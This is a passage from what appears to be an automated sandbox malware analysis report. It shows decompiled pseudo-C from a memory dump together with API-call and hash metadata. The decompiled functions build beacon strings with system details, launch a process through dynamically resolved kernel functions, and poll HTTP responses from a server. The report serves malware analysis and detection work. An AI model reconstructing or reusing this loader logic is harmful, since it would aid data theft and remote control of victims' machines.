            										__eflags = _t84;
            										_t93 = _t84;
            										if(_t84 <= 0) {
            											L51:
            											__eflags = _t93;
            											if(_t93 != 0) {
            												L58:
            												 *0x47ea3c8 = 0;
            												goto L5;
            											}
            											_t77 = 0xf;
            											__eflags = _t84 - _t77;
            											if(_t84 <= _t77) {
            												_t77 = _t84;
            											}
            											_t94 = 0;
            											__eflags = _t77;
            											if(_t77 < 0) {
            												L56:
            												__eflags = _t84 - 0x10;
            												if(_t84 < 0x10) {
            													_t86 = _t84 + 1;
            													__eflags = _t86;
            													 *0x47ea380 = _t86;
            												}
            												goto L58;
            											} else {
            												do {
            													_t68 = 0x47ea388 + _t94 * 4;
            													_t94 = _t94 + 1;
            													__eflags = _t94 - _t77;
            													 *_t68 = _t110;
            													_t110 =  *_t68;
            												} while (_t94 <= _t77);
            												goto L56;
            											}
            										}
            										_t69 = 0x47ea384 + _t84 * 4;
            										while(1) {
            											__eflags =  *_t69 - _t110;
            											if( *_t69 == _t110) {
            												goto L51;
            											}
            											_t93 = _t93 - 1;
            											_t69 = _t69 - 4;
            											__eflags = _t93;
            											if(_t93 > 0) {
            												continue;
            											}
            											goto L51;
            										}
            										goto L51;
            									}
            									_t87 = _v32;
            									__eflags =  *_t87 - 0x5a4d;
            									if( *_t87 != 0x5a4d) {
            										goto L59;
            									}
            									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
            									__eflags =  *_t71 - 0x4550;
            									if( *_t71 != 0x4550) {
            										goto L59;
            									}
            									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
            									if( *((short*)(_t71 + 0x18)) != 0x10b) {
            										goto L59;
            									}
            									_t78 = _t76 - _t87;
            									__eflags =  *((short*)(_t71 + 6));
            									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
            									if( *((short*)(_t71 + 6)) <= 0) {
            										goto L59;
            									}
            									_t72 =  *((intOrPtr*)(_t89 + 0xc));
            									__eflags = _t78 - _t72;
            									if(_t78 < _t72) {
            										goto L46;
            									}
            									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
            									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
            										goto L46;
            									}
            									__eflags =  *(_t89 + 0x27) & 0x00000080;
            									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
            										goto L20;
            									}
            									goto L46;
            								}
            							} else {
            								goto L16;
            							}
            							while(1) {
            								L16:
            								__eflags =  *((intOrPtr*)(0x47ea388 + _t58 * 4)) - _t110;
            								if( *((intOrPtr*)(0x47ea388 + _t58 * 4)) == _t110) {
            									break;
            								}
            								_t58 = _t58 + 1;
            								__eflags = _t58 - _t81;
            								if(_t58 < _t81) {
            									continue;
            								}
            								goto L18;
            							}
            							__eflags = _t58;
            							if(_t58 <= 0) {
            								goto L5;
            							}
            							 *0x47ea3c8 = 1;
            							__eflags =  *0x47ea3c8;
            							if( *0x47ea3c8 != 0) {
            								goto L5;
            							}
            							__eflags =  *((intOrPtr*)(0x47ea388 + _t58 * 4)) - _t110;
            							if( *((intOrPtr*)(0x47ea388 + _t58 * 4)) == _t110) {
            								L32:
            								_t100 = 0;
            								__eflags = _t58;
            								if(_t58 < 0) {
            									L34:
            									 *0x47ea3c8 = 0;
            									goto L5;
            								} else {
            									goto L33;
            								}
            								do {
            									L33:
            									_t90 = 0x47ea388 + _t100 * 4;
            									_t100 = _t100 + 1;
            									__eflags = _t100 - _t58;
            									 *_t90 = _t110;
            									_t110 =  *_t90;
            								} while (_t100 <= _t58);
            								goto L34;
            							}
            							_t25 = _t81 - 1; // -1
            							_t58 = _t25;
            							__eflags = _t58;
            							if(_t58 < 0) {
            								L28:
            								__eflags = _t81 - 0x10;
            								if(_t81 < 0x10) {
            									_t81 = _t81 + 1;
            									__eflags = _t81;
            									 *0x47ea380 = _t81;
            								}
            								_t28 = _t81 - 1; // 0x0
            								_t58 = _t28;
            								goto L32;
            							} else {
            								goto L25;
            							}
            							while(1) {
            								L25:
            								__eflags =  *((intOrPtr*)(0x47ea388 + _t58 * 4)) - _t110;
            								if( *((intOrPtr*)(0x47ea388 + _t58 * 4)) == _t110) {
            									break;
            								}
            								_t58 = _t58 - 1;
            								__eflags = _t58;
            								if(_t58 >= 0) {
            									continue;
            								}
            								break;
            							}
            							__eflags = _t58;
            							if(__eflags >= 0) {
            								if(__eflags == 0) {
            									goto L34;
            								}
            								goto L32;
            							}
            							goto L28;
            						}
            						_t75 =  *((intOrPtr*)(_t108 - 8));
            						__eflags = _t75 - _v8;
            						if(_t75 < _v8) {
            							goto L20;
            						}
            						__eflags = _t75 - _t108;
            						if(_t75 >= _t108) {
            							goto L20;
            						}
            						goto L15;
            					}
            					L5:
            					_t63 = 1;
            					goto L60;
            				} else {
            					goto L3;
            				}
            			}

            APIs
            • NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 047E8602
            Memory Dump Source
            • Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true
            • Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_47e0000_server.jbxd
            Similarity
            • API ID: MemoryQueryVirtual
            • String ID:
            • API String ID: 2850889275-0
            • Opcode ID: af4e6450ccf0f7152a26077d9dc8f91846882e38aacb435e1f84a5767a3e981f
            • Instruction ID: 2f36054a6ca0cb02fa941724ffede459591b863e860284ccc701c266845d4456
            • Opcode Fuzzy Hash: af4e6450ccf0f7152a26077d9dc8f91846882e38aacb435e1f84a5767a3e981f
            • Instruction Fuzzy Hash: C361F431700601DFDB29EF6BC98067973A5FB8D354B268B29D416DB392E731F842C652
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 71%
            			E047E832C(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
            				intOrPtr _v8;
            				char _v12;
            				void* __ebp;
            				signed int* _t43;
            				char _t44;
            				void* _t46;
            				void* _t49;
            				intOrPtr* _t53;
            				void* _t54;
            				void* _t65;
            				long _t66;
            				signed int* _t80;
            				signed int* _t82;
            				void* _t84;
            				signed int _t86;
            				void* _t89;
            				void* _t95;
            				void* _t96;
            				void* _t99;
            				void* _t106;
            
            				_t43 = _t84;
            				_t65 = __ebx + 2;
            				 *_t43 =  *_t43 ^ __edx ^  *__eax;
            				_t89 = _t95;
            				_t96 = _t95 - 8;
            				_push(_t65);
            				_push(_t84);
            				_push(_t89);
            				asm("cld");
            				_t66 = _a8;
            				_t44 = _a4;
            				if(( *(_t44 + 4) & 0x00000006) != 0) {
            					_push(_t89);
            					E047E8497(_t66 + 0x10, _t66, 0xffffffff);
            					_t46 = 1;
            				} else {
            					_v12 = _t44;
            					_v8 = _a12;
            					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
            					_t86 =  *(_t66 + 0xc);
            					_t80 =  *(_t66 + 8);
            					_t49 = E047E8551(_t66);
            					_t99 = _t96 + 4;
            					if(_t49 == 0) {
            						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
            						goto L11;
            					} else {
            						while(_t86 != 0xffffffff) {
            							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
            							if(_t53 == 0) {
            								L8:
            								_t80 =  *(_t66 + 8);
            								_t86 = _t80[_t86 + _t86 * 2];
            								continue;
            							} else {
            								_t54 =  *_t53();
            								_t89 = _t89;
            								_t86 = _t86;
            								_t66 = _a8;
            								_t55 = _t54;
            								_t106 = _t54;
            								if(_t106 == 0) {
            									goto L8;
            								} else {
            									if(_t106 < 0) {
            										_t46 = 0;
            									} else {
            										_t82 =  *(_t66 + 8);
            										E047E843C(_t55, _t66);
            										_t89 = _t66 + 0x10;
            										E047E8497(_t89, _t66, 0);
            										_t99 = _t99 + 0xc;
            										E047E8533(_t82[2]);
            										 *(_t66 + 0xc) =  *_t82;
            										_t66 = 0;
            										_t86 = 0;
            										 *(_t82[2])(1);
            										goto L8;
            									}
            								}
            							}
            							goto L13;
            						}
            						L11:
            						_t46 = 1;
            					}
            				}
            				L13:
            				return _t46;
            			}

            Memory Dump Source
            • Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true
            • Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_47e0000_server.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
            • Instruction ID: 1ad74d4aaddc240006c5acfa68b3f911fc3cd977eeb6c6d781eba4f65c51e9c5
            • Opcode Fuzzy Hash: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
            • Instruction Fuzzy Hash: E021A4329002049FDB10EF69C8C49BBBBA5FF49350B468269D9559B345EB30F915CBE1
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 76%
            			E047E2B91(long __eax, intOrPtr _a4, void* _a8, void* _a16, void* _a20, void* _a24, intOrPtr _a32, void* _a40, intOrPtr _a44) {
            				intOrPtr _v4;
            				signed int _v8;
            				int* _v12;
            				char* _v16;
            				intOrPtr _v20;
            				void* _v24;
            				intOrPtr _v32;
            				intOrPtr _v36;
            				void* _v40;
            				void* __ebx;
            				void* __edi;
            				long _t68;
            				intOrPtr _t69;
            				intOrPtr _t70;
            				intOrPtr _t71;
            				intOrPtr _t72;
            				intOrPtr _t73;
            				void* _t76;
            				intOrPtr _t77;
            				int _t80;
            				intOrPtr _t81;
            				intOrPtr _t85;
            				intOrPtr _t86;
            				intOrPtr _t87;
            				void* _t89;
            				void* _t92;
            				intOrPtr _t96;
            				intOrPtr _t100;
            				intOrPtr* _t102;
            				int* _t108;
            				int* _t118;
            				char** _t120;
            				char* _t121;
            				intOrPtr* _t126;
            				intOrPtr* _t128;
            				intOrPtr* _t130;
            				intOrPtr* _t132;
            				intOrPtr _t135;
            				intOrPtr _t139;
            				int _t142;
            				intOrPtr _t144;
            				int _t147;
            				intOrPtr _t148;
            				int _t151;
            				void* _t152;
            				intOrPtr _t166;
            				void* _t168;
            				int _t169;
            				void* _t170;
            				void* _t171;
            				long _t172;
            				intOrPtr* _t173;
            				intOrPtr* _t174;
            				intOrPtr _t175;
            				intOrPtr* _t178;
            				char** _t181;
            				char** _t183;
            				char** _t184;
            				void* _t189;
            
            				_t68 = __eax;
            				_t181 =  &_v16;
            				_t152 = _a20;
            				_a20 = 8;
            				if(__eax == 0) {
            					_t68 = GetTickCount();
            				}
            				_t69 =  *0x47ea018; // 0x9e6833dc
            				asm("bswap eax");
            				_t70 =  *0x47ea014; // 0x3a87c8cd
            				asm("bswap eax");
            				_t71 =  *0x47ea010; // 0xd8d2f808
            				asm("bswap eax");
            				_t72 =  *0x47ea00c; // 0x13d015ef
            				asm("bswap eax");
            				_t73 =  *0x47ea348; // 0xc3d5a8
            				_t3 = _t73 + 0x47eb5ac; // 0x74666f73
            				_t169 = wsprintfA(_t152, _t3, 3, 0x3d18f, _t72, _t71, _t70, _t69,  *0x47ea02c,  *0x47ea004, _t68);
            				_t76 = E047E467F();
            				_t77 =  *0x47ea348; // 0xc3d5a8
            				_t4 = _t77 + 0x47eb575; // 0x74707526
            				_t80 = wsprintfA(_t169 + _t152, _t4, _t76);
            				_t183 =  &(_t181[0xe]);
            				_t170 = _t169 + _t80;
            				if(_a24 != 0) {
            					_t148 =  *0x47ea348; // 0xc3d5a8
            					_t8 = _t148 + 0x47eb508; // 0x732526
            					_t151 = wsprintfA(_t170 + _t152, _t8, _a24);
            					_t183 =  &(_t183[3]);
            					_t170 = _t170 + _t151;
            				}
            				_t81 =  *0x47ea348; // 0xc3d5a8
            				_t10 = _t81 + 0x47eb89e; // 0x5428e46
            				_t153 = _t10;
            				_t189 = _a20 - _t10;
            				_t12 = _t81 + 0x47eb246; // 0x74636126
            				_t164 = 0 | _t189 == 0x00000000;
            				_t171 = _t170 + wsprintfA(_t170 + _t152, _t12, _t189 == 0);
            				_t85 =  *0x47ea36c; // 0x54295b0
            				_t184 =  &(_t183[3]);
            				if(_t85 != 0) {
            					_t144 =  *0x47ea348; // 0xc3d5a8
            					_t16 = _t144 + 0x47eb8be; // 0x3d736f26
            					_t147 = wsprintfA(_t171 + _t152, _t16, _t85);
            					_t184 =  &(_t184[3]);
            					_t171 = _t171 + _t147;
            				}
            				_t86 = E047E472F(_t153);
            				_a32 = _t86;
            				if(_t86 != 0) {
            					_t139 =  *0x47ea348; // 0xc3d5a8
            					_t19 = _t139 + 0x47eb8d0; // 0x736e6426
            					_t142 = wsprintfA(_t171 + _t152, _t19, _t86);
            					_t184 =  &(_t184[3]);
            					_t171 = _t171 + _t142;
            					HeapFree( *0x47ea2d8, 0, _a40);
            				}
            				_t87 = E047E1340();
            				_a32 = _t87;
            				if(_t87 != 0) {
            					_t135 =  *0x47ea348; // 0xc3d5a8
            					_t23 = _t135 + 0x47eb8c5; // 0x6f687726
            					wsprintfA(_t171 + _t152, _t23, _t87);
            					_t184 =  &(_t184[3]);
            					HeapFree( *0x47ea2d8, 0, _a40);
            				}
            				_t166 =  *0x47ea3cc; // 0x5429600
            				_t89 = E047E6B59(0x47ea00a, _t166 + 4);
            				_t172 = 0;
            				_a16 = _t89;
            				if(_t89 == 0) {
            					L30:
            					HeapFree( *0x47ea2d8, _t172, _t152);
            					return _a44;
            				} else {
            					_t92 = RtlAllocateHeap( *0x47ea2d8, 0, 0x800);
            					_a24 = _t92;
            					if(_t92 == 0) {
            						L29:
            						HeapFree( *0x47ea2d8, _t172, _a8);
            						goto L30;
            					}
            					E047E2915(GetTickCount());
            					_t96 =  *0x47ea3cc; // 0x5429600
            					__imp__(_t96 + 0x40);
            					asm("lock xadd [eax], ecx");
            					_t100 =  *0x47ea3cc; // 0x5429600
            					__imp__(_t100 + 0x40);
            					_t102 =  *0x47ea3cc; // 0x5429600
            					_t168 = E047E6675(1, _t164, _t152,  *_t102);
            					asm("lock xadd [eax], ecx");
            					if(_t168 == 0) {
            						L28:
            						HeapFree( *0x47ea2d8, _t172, _a16);
            						goto L29;
            					}
            					StrTrimA(_t168, 0x47e9280);
            					_push(_t168);
            					_t108 = E047E7563();
            					_v12 = _t108;
            					if(_t108 == 0) {
            						L27:
            						HeapFree( *0x47ea2d8, _t172, _t168);
            						goto L28;
            					}
            					_t173 = __imp__;
            					 *_t173(_t168, _a8);
            					 *_t173(_a4, _v12);
            					_t174 = __imp__;
            					 *_t174(_v4, _v24);
            					_t175 = E047E6536( *_t174(_v12, _t168), _v20);
            					_v36 = _t175;
            					if(_t175 == 0) {
            						_v8 = 8;
            						L25:
            						E047E63F6();
            						L26:
            						HeapFree( *0x47ea2d8, 0, _v40);
            						_t172 = 0;
            						goto L27;
            					}
            					_t118 = E047E6F7D(_t152, 0xffffffffffffffff, _t168,  &_v24);
            					_v12 = _t118;
            					if(_t118 == 0) {
            						_t178 = _v24;
            						_v20 = E047E597D(_t178, _t175, _v16, _v12);
            						_t126 =  *((intOrPtr*)(_t178 + 8));
            						 *((intOrPtr*)( *_t126 + 0x80))(_t126);
            						_t128 =  *((intOrPtr*)(_t178 + 8));
            						 *((intOrPtr*)( *_t128 + 8))(_t128);
            						_t130 =  *((intOrPtr*)(_t178 + 4));
            						 *((intOrPtr*)( *_t130 + 8))(_t130);
            						_t132 =  *_t178;
            						 *((intOrPtr*)( *_t132 + 8))(_t132);
            						E047E61DA(_t178);
            					}
            					if(_v8 != 0x10d2) {
            						L20:
            						if(_v8 == 0) {
            							_t120 = _v16;
            							if(_t120 != 0) {
            								_t121 =  *_t120;
            								_t176 =  *_v12;
            								_v16 = _t121;
            								wcstombs(_t121, _t121,  *_v12);
            								 *_v24 = E047E673A(_v16, _v16, _t176 >> 1);
            							}
            						}
            						goto L23;
            					} else {
            						if(_v16 != 0) {
            							L23:
            							E047E61DA(_v32);
            							if(_v12 == 0 || _v8 == 0x10d2) {
            								goto L26;
            							} else {
            								goto L25;
            							}
            						}
            						_v8 = _v8 & 0x00000000;
            						goto L20;
            					}
            				}
            			}

            Per-line instruction address column for E047E2B91 (spilled out of the side-by-side layout during extraction; range 0x047e2b91 to 0x047e2eff)

            APIs
            • GetTickCount.KERNEL32 ref: 047E2BA8
            • wsprintfA.USER32 ref: 047E2BF5
            • wsprintfA.USER32 ref: 047E2C12
            • wsprintfA.USER32 ref: 047E2C34
            • wsprintfA.USER32 ref: 047E2C5B
            • wsprintfA.USER32 ref: 047E2C7C
            • wsprintfA.USER32 ref: 047E2CA7
            • HeapFree.KERNEL32(00000000,?), ref: 047E2CBA
            • wsprintfA.USER32 ref: 047E2CD9
            • HeapFree.KERNEL32(00000000,?), ref: 047E2CEA
              • Part of subcall function 047E6B59: RtlEnterCriticalSection.NTDLL(054295C0), ref: 047E6B75
              • Part of subcall function 047E6B59: RtlLeaveCriticalSection.NTDLL(054295C0), ref: 047E6B93
            • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 047E2D19
            • GetTickCount.KERNEL32 ref: 047E2D2B
            • RtlEnterCriticalSection.NTDLL(054295C0), ref: 047E2D3F
            • RtlLeaveCriticalSection.NTDLL(054295C0), ref: 047E2D5D
              • Part of subcall function 047E6675: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,76B5C740,047E3ECE,00000000,05429600), ref: 047E66A0
              • Part of subcall function 047E6675: lstrlen.KERNEL32(00000000,?,76B5C740,047E3ECE,00000000,05429600), ref: 047E66A8
              • Part of subcall function 047E6675: strcpy.NTDLL ref: 047E66BF
              • Part of subcall function 047E6675: lstrcat.KERNEL32(00000000,00000000), ref: 047E66CA
              • Part of subcall function 047E6675: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,047E3ECE,?,76B5C740,047E3ECE,00000000,05429600), ref: 047E66E7
            • StrTrimA.SHLWAPI(00000000,047E9280,?,05429600), ref: 047E2D8F
              • Part of subcall function 047E7563: lstrlen.KERNEL32(05429BF8,00000000,00000000,00000000,047E3EF9,00000000), ref: 047E7573
              • Part of subcall function 047E7563: lstrlen.KERNEL32(?), ref: 047E757B
              • Part of subcall function 047E7563: lstrcpy.KERNEL32(00000000,05429BF8), ref: 047E758F
              • Part of subcall function 047E7563: lstrcat.KERNEL32(00000000,?), ref: 047E759A
            • lstrcpy.KERNEL32(00000000,?), ref: 047E2DB2
            • lstrcpy.KERNEL32(?,?), ref: 047E2DBC
            • lstrcat.KERNEL32(?,?), ref: 047E2DCC
            • lstrcat.KERNEL32(?,00000000), ref: 047E2DD3
              • Part of subcall function 047E6536: lstrlen.KERNEL32(?,00000000,05429E00,00000000,047E6F0A,0542A023,43175AC3,?,?,?,?,43175AC3,00000005,047EA00C,4D283A53,?), ref: 047E653D
              • Part of subcall function 047E6536: mbstowcs.NTDLL ref: 047E6566
              • Part of subcall function 047E6536: memset.NTDLL ref: 047E6578
            • wcstombs.NTDLL ref: 047E2E76
              • Part of subcall function 047E597D: SysAllocString.OLEAUT32(?), ref: 047E59B8
              • Part of subcall function 047E61DA: RtlFreeHeap.NTDLL(00000000,00000000,047E6383,00000000,?,00000000,00000000), ref: 047E61E6
            • HeapFree.KERNEL32(00000000,?), ref: 047E2EBF
            • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 047E2ECB
            • HeapFree.KERNEL32(00000000,?,?,05429600), ref: 047E2ED8
            • HeapFree.KERNEL32(00000000,?), ref: 047E2EE5
            • HeapFree.KERNEL32(00000000,?), ref: 047E2EEF
            Similarity
            • API ID: Heap$Free$wsprintf$lstrlen$CriticalSectionlstrcat$lstrcpy$CountEnterLeaveTickTrim$AllocAllocateStringmbstowcsmemsetstrcpywcstombs
            • String ID: Uet
            • API String ID: 1185349883-2766386878
            • Opcode ID: b0183d82b4dcceffd5d02c99bd320d54e8b761c0a35379de3d312ede195b0a5f
            • Instruction ID: 7073de73eb4a02edbc74763ca79cef038b39d79577a97ab7401413f5db48f6bb
            • Opcode Fuzzy Hash: b0183d82b4dcceffd5d02c99bd320d54e8b761c0a35379de3d312ede195b0a5f
            • Instruction Fuzzy Hash: BFA18C72500210AFD711DF66DC88EAA7BE8EF8C718F054A68F449DB221D739ED45CB61
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 73%
            			E047E37DF(void* __eax, void* __ecx) {
            				long _v8;
            				char _v12;
            				void* _v16;
            				void* _v28;
            				long _v32;
            				void _v104;
            				char _v108;
            				long _t36;
            				intOrPtr _t40;
            				intOrPtr _t47;
            				intOrPtr _t50;
            				void* _t58;
            				void* _t68;
            				intOrPtr* _t70;
            				intOrPtr* _t71;
            
            				_t1 = __eax + 0x14; // 0x74183966
            				_t69 =  *_t1;
            				_t36 = E047E6BF9(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16);
            				_v8 = _t36;
            				if(_t36 != 0) {
            					L12:
            					return _v8;
            				}
            				E047E7AB0( *((intOrPtr*)(_t69 + 0xc)),  *((intOrPtr*)(_t69 + 8)), _v12);
            				_t40 = _v12(_v12);
            				_v8 = _t40;
            				if(_t40 == 0 && ( *0x47ea300 & 0x00000001) != 0) {
            					_v32 = 0;
            					asm("stosd");
            					asm("stosd");
            					asm("stosd");
            					_v108 = 0;
            					memset( &_v104, 0, 0x40);
            					_t47 =  *0x47ea348; // 0xc3d5a8
            					_t18 = _t47 + 0x47eb706; // 0x73797325
            					_t68 = E047E127E(_t18);
            					if(_t68 == 0) {
            						_v8 = 8;
            					} else {
            						_t50 =  *0x47ea348; // 0xc3d5a8
            						_t19 = _t50 + 0x47eb86c; // 0x5428e14
            						_t20 = _t50 + 0x47eb3f6; // 0x4e52454b
            						_t71 = GetProcAddress(GetModuleHandleA(_t20), _t19);
            						if(_t71 == 0) {
            							_v8 = 0x7f;
            						} else {
            							_v108 = 0x44;
            							E047E5B56();
            							_t58 =  *_t71(0, _t68, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0);
            							_push(1);
            							E047E5B56();
            							if(_t58 == 0) {
            								_v8 = GetLastError();
            							} else {
            								CloseHandle(_v28);
            								CloseHandle(_v32);
            							}
            						}
            						HeapFree( *0x47ea2d8, 0, _t68);
            					}
            				}
            				_t70 = _v16;
            				 *((intOrPtr*)(_t70 + 0x18))( *((intOrPtr*)(_t70 + 0x1c))( *_t70));
            				E047E61DA(_t70);
            				goto L12;
            			}

            Per-line instruction address column for E047E37DF (spilled out of the side-by-side layout during extraction; range 0x047e37e7 to 0x047e3916)

            APIs
              • Part of subcall function 047E6BF9: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,047E37FB,?,?,?,?,00000000,00000000), ref: 047E6C1E
              • Part of subcall function 047E6BF9: GetProcAddress.KERNEL32(00000000,7243775A), ref: 047E6C40
              • Part of subcall function 047E6BF9: GetProcAddress.KERNEL32(00000000,614D775A), ref: 047E6C56
              • Part of subcall function 047E6BF9: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 047E6C6C
              • Part of subcall function 047E6BF9: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 047E6C82
              • Part of subcall function 047E6BF9: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 047E6C98
            • memset.NTDLL ref: 047E3849
              • Part of subcall function 047E127E: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,74183966,00000000,047E3862,73797325), ref: 047E128F
              • Part of subcall function 047E127E: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 047E12A9
            • GetModuleHandleA.KERNEL32(4E52454B,05428E14,73797325), ref: 047E387F
            • GetProcAddress.KERNEL32(00000000), ref: 047E3886
            • HeapFree.KERNEL32(00000000,00000000), ref: 047E38EE
              • Part of subcall function 047E5B56: GetProcAddress.KERNEL32(36776F57,047E2425), ref: 047E5B71
            • CloseHandle.KERNEL32(00000000,00000001), ref: 047E38CB
            • CloseHandle.KERNEL32(?), ref: 047E38D0
            • GetLastError.KERNEL32(00000001), ref: 047E38D4
            Similarity
            • API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ErrorFreeHeapLastmemset
            • String ID: Uet$@MetNet
            • API String ID: 3075724336-1616585941
            • Opcode ID: 37a70927e899804c2665bb0a0564ded16c4102f6741edbf5a0ad0f77eef7d1e7
            • Instruction ID: 9eaa990b753494d6a9a659fc8e95d3ec5d7d13cfe6a3cdc964ef0af67ddc68d6
            • Opcode Fuzzy Hash: 37a70927e899804c2665bb0a0564ded16c4102f6741edbf5a0ad0f77eef7d1e7
            • Instruction Fuzzy Hash: 9D3114B2900209AFDB10EFE6DC88DEE7BBCEB0C318F114665E605A7211D735AD45DB60
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E047E3FA5(void* __ecx, void* __esi) {
            				long _v8;
            				long _v12;
            				long _v16;
            				long _v20;
            				long _t34;
            				long _t39;
            				long _t42;
            				long _t56;
            				void* _t58;
            				void* _t59;
            				void* _t61;
            
            				_t61 = __esi;
            				_t59 = __ecx;
            				 *((intOrPtr*)(__esi + 0x2c)) = 0;
            				do {
            					_t34 = WaitForSingleObject( *(_t61 + 0x1c), 0);
            					_v20 = _t34;
            					if(_t34 != 0) {
            						L3:
            						_v8 = 4;
            						_v16 = 0;
            						if(HttpQueryInfoA( *(_t61 + 0x18), 0x20000013, _t61 + 0x2c,  &_v8,  &_v16) == 0) {
            							_t39 = GetLastError();
            							_v12 = _t39;
            							if(_v20 == 0 || _t39 != 0x2ef3) {
            								L15:
            								return _v12;
            							} else {
            								goto L11;
            							}
            						}
            						if(_v8 != 4 ||  *(_t61 + 0x2c) == 0) {
            							goto L11;
            						} else {
            							_v16 = 0;
            							_v8 = 0;
            							HttpQueryInfoA( *(_t61 + 0x18), 0x16, 0,  &_v8,  &_v16);
            							_t58 = E047E33DC(_v8 + 1);
            							if(_t58 == 0) {
            								_v12 = 8;
            							} else {
            								if(HttpQueryInfoA( *(_t61 + 0x18), 0x16, _t58,  &_v8,  &_v16) == 0) {
            									E047E61DA(_t58);
            									_v12 = GetLastError();
            								} else {
            									 *((char*)(_t58 + _v8)) = 0;
            									 *(_t61 + 0xc) = _t58;
            								}
            							}
            							goto L15;
            						}
            					}
            					SetEvent( *(_t61 + 0x1c));
            					_t56 =  *((intOrPtr*)(_t61 + 0x28));
            					_v12 = _t56;
            					if(_t56 != 0) {
            						goto L15;
            					}
            					goto L3;
            					L11:
            					_t42 = E047E16B2( *(_t61 + 0x1c), _t59, 0xea60);
            					_v12 = _t42;
            				} while (_t42 == 0);
            				goto L15;
            			}

            Per-line instruction address column for E047E3FA5 (spilled out of the side-by-side layout during extraction; range 0x047e3fa5 to 0x047e40a2)

            APIs
            • WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,746981D0,00000000,00000000), ref: 047E3FBC
            • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,047E3F34,00000000,?), ref: 047E3FCC
            • HttpQueryInfoA.WININET(?,20000013,?,?), ref: 047E3FFE
            • HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 047E4023
            • HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 047E4043
            • GetLastError.KERNEL32 ref: 047E4055
              • Part of subcall function 047E16B2: WaitForMultipleObjects.KERNEL32(00000002,047E7C47,00000000,047E7C47,?,?,?,047E7C47,0000EA60), ref: 047E16CD
              • Part of subcall function 047E61DA: RtlFreeHeap.NTDLL(00000000,00000000,047E6383,00000000,?,00000000,00000000), ref: 047E61E6
            • GetLastError.KERNEL32(00000000), ref: 047E408A
            Similarity
            • API ID: HttpInfoQuery$ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
            • String ID: @MetNet
            • API String ID: 3369646462-2109406137
            • Opcode ID: cdf6af6cc6283e9c8304c5f58e09e78178eaaad09d40bd103c6918e82e558042
            • Instruction ID: 79bc4c1de8bc77a27c382f220062e726ffb38474ae8290ff618956c9e781b993
            • Opcode Fuzzy Hash: cdf6af6cc6283e9c8304c5f58e09e78178eaaad09d40bd103c6918e82e558042
            • Instruction Fuzzy Hash: 0E3100B5D00309EFDB21DFE6CC849AEB7B8EB4C304F104AB9E642A6641D775AA449F50
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 43%
            			E047E7238(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
            				intOrPtr _v8;
            				intOrPtr _v12;
            				intOrPtr _v16;
            				char _v20;
            				intOrPtr _v24;
            				signed int _v28;
            				intOrPtr _v32;
            				void* __edi;
            				void* __esi;
            				intOrPtr _t58;
            				signed int _t60;
            				signed int _t62;
            				intOrPtr _t64;
            				intOrPtr _t66;
            				intOrPtr _t70;
            				void* _t72;
            				void* _t75;
            				void* _t76;
            				intOrPtr _t80;
            				WCHAR* _t83;
            				void* _t84;
            				void* _t85;
            				void* _t86;
            				intOrPtr _t92;
